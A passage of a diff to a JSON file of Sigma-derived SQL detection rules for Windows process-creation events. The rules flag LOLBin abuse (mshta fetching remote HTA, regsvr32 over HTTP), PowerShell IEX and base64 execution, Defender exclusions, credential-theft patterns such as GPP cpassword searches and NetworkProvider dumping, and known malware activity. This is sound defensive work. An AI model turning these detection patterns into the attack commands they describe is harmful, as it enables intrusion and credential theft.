'%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\')) AND NOT (((ParentCommandLine LIKE '%-k apphost -s AppHostSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k imgsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k localService -p -s RemoteRegistry%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k LocalSystemNetworkRestricted -p -s NgcSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetSvcs -p -s NcaSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s NetSetupSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s wlidsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetworkService -p -s DoSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s AppXSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s ClipSVC%' ESCAPE '\\')))) AND NOT (((ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_renamed_adfind.yml" + "filename": "proc_creation_win_conhost_uncommon_parent.yml" }, { - "title": "Suspicious Recursive Takeown", - "id": "554601fb-9b71-4bcc-abf4-21a611be4fde", + "title": "Ie4uinit Lolbin Use From Invalid Path", + "id": "d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", "status": "experimental", - "description": "Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders", + "description": "Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1222.001" + "attack.t1218" ], "falsepositives": [ - "Scripts created by developers and admins", - "Administrative activity" + "ViberPC updater calls this binary with the following commandline \"ie4uinit.exe -ClearIconCache\"" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\takeown.exe' ESCAPE '\\' AND CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%/r%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ie4uinit.exe' ESCAPE '\\' OR OriginalFileName = 'IE4UINIT.EXE') AND NOT (((CurrentDirectory LIKE 'c:\\\\windows\\\\system32\\\\' ESCAPE '\\' OR CurrentDirectory LIKE 'c:\\\\windows\\\\sysWOW64\\\\' ESCAPE '\\')) OR (CurrentDirectory = '')))" ], - "filename": "proc_creation_win_takeown_recursive_own.yml" + "filename": "proc_creation_win_lolbin_ie4uinit.yml" }, { - "title": "Certificate Exported Via Certutil.EXE", - "id": "3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5", - "status": "test", - "description": "Detects the execution of the certutil with the \"exportPFX\" flag which allows the utility to export certificates.", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote Access Tool - NetSupport Execution", + "id": "758ff488-18d5-4cbe-8ec4-02b6285a434f", + "status": "experimental", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "There legitimate reasons to export certificates. Investigate the activity to determine if it's benign" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-exportPFX %' ESCAPE '\\' OR CommandLine LIKE '%/exportPFX %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'NetSupport Client Configurator' OR Product = 'NetSupport Remote Control' OR Company = 'NetSupport Ltd' OR OriginalFileName = 'PCICFGUI.EXE'))" ], - "filename": "proc_creation_win_certutil_export_pfx.yml" + "filename": "proc_creation_win_remote_access_tools_netsupport.yml" }, { - "title": "Findstr GPP Passwords", - "id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", - "status": "test", - "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.", + "title": "Suspicious X509Enrollment - Process Creation", + "id": "114de787-4eb2-48cc-abdb-c0b449f93ea4", + "status": "experimental", + "description": "Detect use of X509Enrollment", "author": "frack113", - "tags": [ - "attack.credential_access", - "attack.t1552.006" - ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%cpassword%' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.xml%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%X509Enrollment.CBinaryConverter%' ESCAPE '\\' OR CommandLine LIKE '%884e2002-217d-11da-b2a4-000e7bbb2b09%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_findstr_gpp_passwords.yml" + "filename": "proc_creation_win_powershell_x509enrollment.yml" }, { - "title": "Remotely Hosted HTA File Executed Via Mshta.EXE", - "id": "b98d0db6-511d-45de-ad02-e82a98729620", + "title": "Potential NTLM Coercion Via Certutil.EXE", + "id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", "status": "experimental", - "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", + "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.005" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '% -syncwithWU %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mshta_http.yml" + "filename": "proc_creation_win_certutil_ntlm_coercion.yml" }, { - "title": "Start of NT Virtual DOS Machine", - "id": "16905e21-66ee-42fe-b256-1318ada2d770", - "status": "experimental", - "description": "Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications", - "author": "frack113", + "title": "Potential Ke3chang/TidePool Malware Activity", + "id": "7b544661-69fc-419f-9a59-82ccc328f205", + "status": "test", + "description": "Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020", + "author": "Markus Neis, Swisscom", "tags": [ - "attack.defense_evasion" + "attack.g0004", + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\ntvdm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrstub.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%-Property DWORD -name DisableFirstRunCustomize -value 2 -Force%' ESCAPE '\\' OR CommandLine LIKE '%-Property String -name Check\\_Associations -value%' ESCAPE '\\' OR CommandLine LIKE '%-Property DWORD -name IEHarden -value 0 -Force%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_16bit_application.yml" + "filename": "proc_creation_win_malware_ke3chang_tidepool.yml" }, { - "title": "Command Line Path Traversal Evasion", - "id": "1327381e-6ab0-4f38-b583-4c1b8346a56b", - "status": "experimental", - "description": "Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal", - "author": "Christian Burkard (Nextron Systems)", + "title": "Run PowerShell Script from ADS", + "id": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", + "status": "test", + "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", + "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1564.004" ], "falsepositives": [ - "Google Drive", - "Citrix" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Windows\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\..\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\..\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.exe\\\\..\\\\%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\Google\\\\Drive\\\\googledrivesync.exe\\\\..\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Citrix\\\\Virtual Smart Card\\\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\\\..\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Get-Content%' ESCAPE '\\' AND CommandLine LIKE '%-Stream%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_commandline_path_traversal_evasion.yml" + "filename": "proc_creation_win_powershell_run_script_from_ads.yml" }, { - "title": "Registry Modification Via Regini.EXE", - "id": "5f60740a-f57b-4e76-82a1-15b6ff2cb134", - "status": "experimental", - "description": "Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.", - "author": "Eli Salem, Sander Wiebing, oscd.community", + "title": "Elise Backdoor Activity", + "id": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "status": "test", + "description": "Detects Elise backdoor activity used by APT32", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.g0030", + "attack.g0050", + "attack.s0081", + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate modification of keys" + "Unlikely" ], - "level": "low", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND NOT (CommandLine REGEXP ':[^ \\\\]'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Microsoft\\\\Network\\\\svchost.exe' ESCAPE '\\' OR (CommandLine LIKE '%\\\\Windows\\\\Caches\\\\NavShExt.dll%' ESCAPE '\\' AND CommandLine LIKE '%/c del%' ESCAPE '\\')) OR ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\MICROS~1\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\') AND CommandLine LIKE '%,Setting%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_regini_execution.yml" + "filename": "proc_creation_win_malware_elise.yml" }, { - "title": "Potential Data Stealing Via Chromium Headless Debugging", - "id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", - "status": "experimental", - "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control", + "title": "Sysmon Configuration Update", + "id": "87911521-7098-470b-a459-9a57fc80bdfd", + "status": "test", + "description": "Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1185" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrators might use this command to update Sysmon configuration." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%--remote-debugging-%' ESCAPE '\\' AND CommandLine LIKE '%--user-data-dir%' ESCAPE '\\' AND CommandLine LIKE '%--headless%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-c%' ESCAPE '\\' OR CommandLine LIKE '%/c%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_browsers_chromium_headless_debugging.yml" + "filename": "proc_creation_win_sysinternals_sysmon_config_update.yml" }, { - "title": "Launch-VsDevShell.PS1 Proxy Execution", - "id": "45d3a03d-f441-458c-8883-df101a3bb146", + "title": "SafeBoot Registry Key Deleted Via Reg.EXE", + "id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", "status": "experimental", - "description": "Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", + "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", "tags": [ "attack.defense_evasion", - "attack.t1216.001" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate usage of the script by a developer" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Launch-VsDevShell.ps1%' ESCAPE '\\' AND (CommandLine LIKE '%VsWherePath %' ESCAPE '\\' OR CommandLine LIKE '%VsInstallationPath %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_launch_vsdevshell.yml" + "filename": "proc_creation_win_reg_delete_safeboot.yml" }, { - "title": "Suspicious MSDT Parent Process", - "id": "7a74da6b-ea76-47db-92cc-874ad90df734", + "title": "HackTool - SafetyKatz Execution", + "id": "b1876533-4ed5-4a83-90f3-b8645840a413", "status": "experimental", - "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", - "author": "Nextron Systems", + "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SafetyKatz.exe' ESCAPE '\\' OR OriginalFileName = 'SafetyKatz.exe' OR Description = 'SafetyKatz'))" ], - "filename": "proc_creation_win_msdt_susp_parent.yml" + "filename": "proc_creation_win_hktl_safetykatz.yml" }, { - "title": "Suspicious PowerShell IEX Execution Patterns", - "id": "09576804-7a05-458e-a817-eb718ca91f54", - "status": "experimental", - "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", + "title": "PowerShell Base64 Encoded FromBase64String Cmdlet", + "id": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", + "status": "test", + "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.execution", + "attack.t1059.001" + ], "falsepositives": [ - "Legitimate scripts that use IEX" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% | iex;%' ESCAPE '\\' OR CommandLine LIKE '% | iex %' ESCAPE '\\' OR CommandLine LIKE '% | iex}%' ESCAPE '\\' OR CommandLine LIKE '% | IEX ;%' ESCAPE '\\' OR CommandLine LIKE '% | IEX -Error%' ESCAPE '\\' OR CommandLine LIKE '% | IEX (new%' ESCAPE '\\' OR CommandLine LIKE '%);IEX %' ESCAPE '\\') AND (CommandLine LIKE '%::FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%.GetString([System.Convert]::%' ESCAPE '\\')) OR (CommandLine LIKE '%)|iex;$%' ESCAPE '\\' OR CommandLine LIKE '%);iex($%' ESCAPE '\\' OR CommandLine LIKE '%);iex $%' ESCAPE '\\' OR CommandLine LIKE '% | IEX | %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%OjpGcm9tQmFzZTY0U3RyaW5n%' ESCAPE '\\' OR CommandLine LIKE '%o6RnJvbUJhc2U2NFN0cmluZ%' ESCAPE '\\' OR CommandLine LIKE '%6OkZyb21CYXNlNjRTdHJpbm%' ESCAPE '\\' OR (CommandLine LIKE '%OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA%' ESCAPE '\\' OR CommandLine LIKE '%oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_iex_patterns.yml" + "filename": "proc_creation_win_powershell_base64_frombase64string.yml" }, { - "title": "Execute Code with Pester.bat as Parent", - "id": "18988e1b-9087-4f8a-82fe-0414dce49878", + "title": "JSC Convert Javascript To Executable", + "id": "52788a70-f1da-40dd-8fbd-73b5865d6568", "status": "experimental", - "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript code to .exe or .dll format", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1216" + "attack.t1127" ], "falsepositives": [ - "Legitimate use of Pester for writing tests for Powershell scripts and modules" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%\\\\WindowsPowerShell\\\\Modules\\\\Pester\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%{ Invoke-Pester -EnableExit ;%' ESCAPE '\\' OR ParentCommandLine LIKE '%{ Get-Help \"%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\jsc.exe' ESCAPE '\\' AND CommandLine LIKE '%.js%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_pester.yml" + "filename": "proc_creation_win_lolbin_jsc.yml" }, { - "title": "Powershell Defender Exclusion", - "id": "17769c90-230e-488b-a463-e05c08e9d48f", - "status": "experimental", - "description": "Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets", - "author": "Florian Roth (Nextron Systems)", + "title": "Filter Driver Unloaded Via Fltmc.EXE", + "id": "4931188c-178e-4ee7-a348-39e8a7a56821", + "status": "test", + "description": "Detect filter driver unloading activity via fltmc.exe", + "author": "Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1070", + "attack.t1562", + "attack.t1562.002" ], "falsepositives": [ - "Possible Admin Activity", - "Other Cmdlets that may use the same parameters" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Add-MpPreference %' ESCAPE '\\' OR CommandLine LIKE '%Set-MpPreference %' ESCAPE '\\') AND (CommandLine LIKE '% -ExclusionPath %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionExtension %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionProcess %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionIpAddress %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND CommandLine LIKE '%unload%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%unload rtp\\_filesystem\\_filter' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_defender_exclusion.yml" + "filename": "proc_creation_win_fltmc_unload_driver.yml" }, { - "title": "Outlook EnableUnsafeClientMailRules Setting Enabled", - "id": "55f0a3a1-846e-40eb-8273-677371b8d912", - "status": "test", - "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", + "id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "status": "experimental", + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059", - "attack.t1202" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Other legitimate network providers used and not filtred in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\NetworkProvider%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" + "filename": "proc_creation_win_registry_new_network_provider.yml" }, { - "title": "Suspicious Registry Modification From ADS Via Regini.EXE", - "id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", + "title": "PUA - NSudo Execution", + "id": "771d1eb5-9587-4568-95fb-9ec44153a012", "status": "experimental", - "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", - "author": "Eli Salem, Sander Wiebing, oscd.community", + "description": "Detects the use of NSudo tool for command execution", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND CommandLine REGEXP ':[^ \\\\]')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\NSudo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NSudoLC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NSudoLG.exe' ESCAPE '\\') OR OriginalFileName IN ('NSudo.exe', 'NSudoLC.exe', 'NSudoLG.exe')) AND (CommandLine LIKE '%-U:S %' ESCAPE '\\' OR CommandLine LIKE '%-U:T %' ESCAPE '\\' OR CommandLine LIKE '%-U:E %' ESCAPE '\\' OR CommandLine LIKE '%-P:E %' ESCAPE '\\' OR CommandLine LIKE '%-M:S %' ESCAPE '\\' OR CommandLine LIKE '%-M:H %' ESCAPE '\\' OR CommandLine LIKE '%-U=S %' ESCAPE '\\' OR CommandLine LIKE '%-U=T %' ESCAPE '\\' OR CommandLine LIKE '%-U=E %' ESCAPE '\\' OR CommandLine LIKE '%-P=E %' ESCAPE '\\' OR CommandLine LIKE '%-M=S %' ESCAPE '\\' OR CommandLine LIKE '%-M=H %' ESCAPE '\\' OR CommandLine LIKE '%-ShowWindowMode:Hide%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regini_ads.yml" + "filename": "proc_creation_win_pua_nsudo.yml" }, { - "title": "Sysprep on AppData Folder", - "id": "d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e", + "title": "Suspicious Query of MachineGUID", + "id": "f5240972-3938-4e56-8e4b-e33893176c1f", "status": "test", - "description": "Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)", - "author": "Florian Roth (Nextron Systems)", + "description": "Use of reg to get MachineGuid information", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059" + "attack.discovery", + "attack.t1082" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sysprep.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Cryptography%' ESCAPE '\\' AND CommandLine LIKE '%/v %' ESCAPE '\\' AND CommandLine LIKE '%MachineGuid%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysprep_appdata.yml" + "filename": "proc_creation_win_reg_machineguid.yml" }, { - "title": "UAC Bypass Using DismHost", - "id": "853e74f9-9392-4935-ad3b-2e8c040dae86", - "status": "test", - "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious Regsvr32 HTTP IP Pattern", + "id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", + "status": "experimental", + "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1218.010" ], "falsepositives": [ - "Unknown" + "FQDNs that start with a number" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\DismHost.exe%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /s%' ESCAPE 